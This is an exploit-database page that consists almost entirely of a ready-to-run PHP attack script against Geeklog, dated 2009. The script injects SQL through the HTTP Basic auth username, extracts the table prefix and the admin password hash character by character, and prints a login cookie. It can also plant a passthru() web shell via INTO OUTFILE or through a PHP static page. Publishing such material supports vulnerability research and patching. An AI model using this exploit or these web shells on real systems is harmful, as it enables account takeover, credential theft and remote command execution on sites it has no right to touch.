Vulners
Lucene search
Geeklog SEC_authenticate()函数SQL注入漏洞
<?php
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
nil;
} else {
!dl("php_curl.so") ? die($err[1]) :
nil;
}
}
function syntax() {
print (
"Syntax: php ".$argv[0]." [host] [path] [OPTIONS] \n". "Options: \
\n". "--port:[port] - specify a port \
\n". " default->80 \
\n". "--prefix - try to extract table prefix from information.schema \
\n". " default->gl_ \
\n". "--uid:[n] - specify an uid other than default (2,usually admin) \
\n". "--proxy:[host:port] - use proxy \
\n". "--skiptest - skip preliminary tests \
\n". "--test - run only tests \
\n". "--export_shell:[path] - try to export a shell with INTO OUTFILE, needs \
Mysql\n". " FILE privilege \
\n". "--sp - submit a 'staticpage' with php code, needs geeklog \
\n". " sp_php permission set to true for thestaticpage \
\n". " plugin (not the default) \
\n". "Examples: php ".$argv[0]." 192.168.0.1 /geeklog/ \
\n". " php ".$argv[0]." 192.168.0.1 / --prefix --proxy:1.1.1.1:8080 \
\n". " php ".$argv[0]." 192.168.0.1 / --prefix \
--export_shell:/var/www\n". " php ".$argv[0]." 192.168.0.1 / --prefix \
--uid:3"); die();
}
error_reporting(E_ALL ^ E_NOTICE);
$host = $argv[1];
$path = $argv[2];
$prefix = "gl_";
//default
$uid = "2";
$where = "uid=$uid";
$argv[2] ? print("[*] Attacking...\n") :
syntax();
$_f_prefix = false;
$_use_proxy = false;
$port = 80;
$_skiptest = false;
$_verbose = false;
$_test = false;
$sp_submit = false;
$into_outfile = false;
for ($i = 3; $i < $argc; $i++) {
if (stristr($argv[$i], "--prefix")) {
$_f_prefix = true;
}
if (stristr($argv[$i], "--proxy:")) {
$_use_proxy = true;
$tmp = explode(":", $argv[$i]);
$proxy_host = $tmp[1];
$proxy_port = (int)$tmp[2];
}
if (stristr($argv[$i], "--port:")) {
$tmp = explode(":", $argv[$i]);
$port = (int)$tmp[1];
}
if (stristr($argv[$i], "--uid")) {
$tmp = explode(":", $argv[$i]);
$uid = (int)$tmp[1];
$where = "uid=$uid";
}
if (stristr($argv[$i], "--verbose")) {
$_verbose = true;
}
if (stristr($argv[$i], "--skiptest")) {
$_skiptest = true;
}
if (stristr($argv[$i], "--test")) {
$_test = true;
}
if (stristr($argv[$i], "--export_shell:")) {
$tmp = explode(":", $argv[$i]);
$my_path = $tmp[1];
$into_outfile = true;
}
if (stristr($argv[$i], "--sp")) {
$sp_submit = true;
}
}
function _s($url, $auth, $is_post, $request) {
global $_use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; \
it; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"); curl_setopt($ch, CURLOPT_TIMEOUT, \
0);
if ($auth <> "") {
$auth = array("Authorization: Basic ".$auth);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $auth);
}
if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return $_d;
}
function find_prefix() {
global $host, $port, $path, $uid, $pwd, $url;
$_tn = "TABLE_NAME";
$_ift = "information_schema.TABLES";
$_table_prefix = "";
$j = -15;
$usr = "' AND 0 UNION SELECT null,null,null,null FROM $_ift WHERE ".$_tn." \
LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, ""); if (chk_err($_o)) {
die("[!] $_ift not availiable.");
} else {
print "[*] Initiating table prefix extraction...\n";
}
while (!$null_f) {
$mn = 0x00;
$mx = 0xff;
while (1) {
if (($mx + $mn) % 2 == 1) {
$c = round(($mx + $mn) / 2) - 1;
} else {
$c = round(($mx + $mn) / 2);
}
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN \
(ASCII(SUBSTR(".$_tn." FROM $j FOR 1)) >= ".$c.") THEN '' ELSE $uid END) FROM $_ift \
WHERE ".$_tn." LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, "");
if (chk_err($_o)) {
$mn = $c;
} else {
$mx = $c - 1;
}
if (($mx-$mn == 1) or ($mx == $mn)) {
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN \
(ASCII(SUBSTR(".$_tn." FROM $j FOR 1)) >= ".$c.") THEN '' ELSE $uid END) FROM $_ift \
WHERE ".$_tn." LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, ""); if (chk_err($_o)) {
if ($mn <> 0) {
$_table_prefix = chr($mn).$_table_prefix;
} else {
$null_f = true;
}
} else {
if ($mx <> 0) {
$_table_prefix = chr($mx).$_table_prefix;
} else {
$null_f = true;
}
}
if (!$null_f) {
print ("[?] Table prefix->[??]".$_table_prefix."\n");
}
break;
}
}
$j--;
}
print "[?] Table prefix->".$_table_prefix."\n";
return $_table_prefix;
}
function export_sh() {
global $pwd, $url, $prefix, $my_path;
$usr = "' AND 0 UNION SELECT null,'<?php passtrhu(\$_GET[cmd]);?>',null,null \
INTO OUTFILE '".$my_path."/sh.php' FROM ".$prefix."users LIMIT 1/*"; $_o = _s($url, \
base64_encode($usr.":".$pwd) , 0, ""); if (chk_err($_o)) {
print ("[*] Sql error.");
} else {
print ("[*] Done.");
}
}
function sp_php() {
global $host, $port, $path, $pwd, $prefix, $uid;
srand(make_seed());
$id = rand(0x1, 0xffffff);
echo "[*] id->".$id."\n";
$sh = "passthru(\$_GET[cmd]);";
//always specify the namespaceuri
//if the staticpages.PHP permission is not avaliable, sp_php will be resetted \
to 0 $data = "<?xml version=\"1.0\"?>". "<entry>". "<title term=\"1\" \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">\x20\x20\x20\x20</title>". "<id \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">$id</id>". "<sp_content \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">$sh</sp_content>". "<sp_php \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</sp_php>". "<gl_etag \
xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</gl_etag>". "</entry>";
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,$uid FROM ".$prefix."users \
LIMIT 1/*";
$url = "http://$host:$port".$path."webservices/atom/index.php?plugin=staticpag \
es"; $out = _s($url, base64_encode($usr.":".$pwd) , 1, $data);
if (chk_err($_o)) {
print ("[*] Sql error.");
} else {
print ("[*] Done! \
Visit->http://$host:$port".$path."staticpages/index.php?page=$id&cmd=ls%20-la"); }
}
function make_seed() {
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
function chk_err($s) {
if (stripos ($s, \
"\x41\x6e\x20\x53\x51\x4c\x20\x65\x72\x72\x6f\x72\x20\x68\x61\x73\x20\x6f\x63\x63\x75\ \
x72\x72\x65\x64\x2e")) { return true;
} else {
return false;
}
}
$pwd = "AAAA";
$url = "http://$host:$port".$path."webservices/atom/index.php?plugin=staticpages"; \
if (!$_skiptest) {
$out = _s($url, base64_encode("':'") , 0, "");
if (chk_err($out)) {
print("[*] Vulnerable!\n");
} else {
die("[!] Not vulnerable.");
}
}
if ($_test) {
die;
}
if ($_f_prefix == true) {
$prefix = find_prefix();
}
if ($into_outfile == true) {
export_sh();
die;
}
if ($sp_submit == true) {
sp_php();
die;
}
$c = array();
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
$_hash = "";
print ("[*] Initiating hash extraction ...\n");
for ($j = 1; $j < 0x21; $j++) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
//uid is mediumint, so if you assign a string value to it you have an \
sql error, so the script fails hence true/fails questions and you bypass speed limit \
also $usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(passwd \
FROM $j FOR 1))=$i) THEN '' ELSE $uid END) FROM ".$prefix."users WHERE $where LIMIT \
1/*"; $out = _s($url, base64_encode($usr.":".$pwd) , 0, "");
if (chk_err($out)) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
}
print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n";
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2009 00:00Current
7.3High risk
Vulners AI Score7.3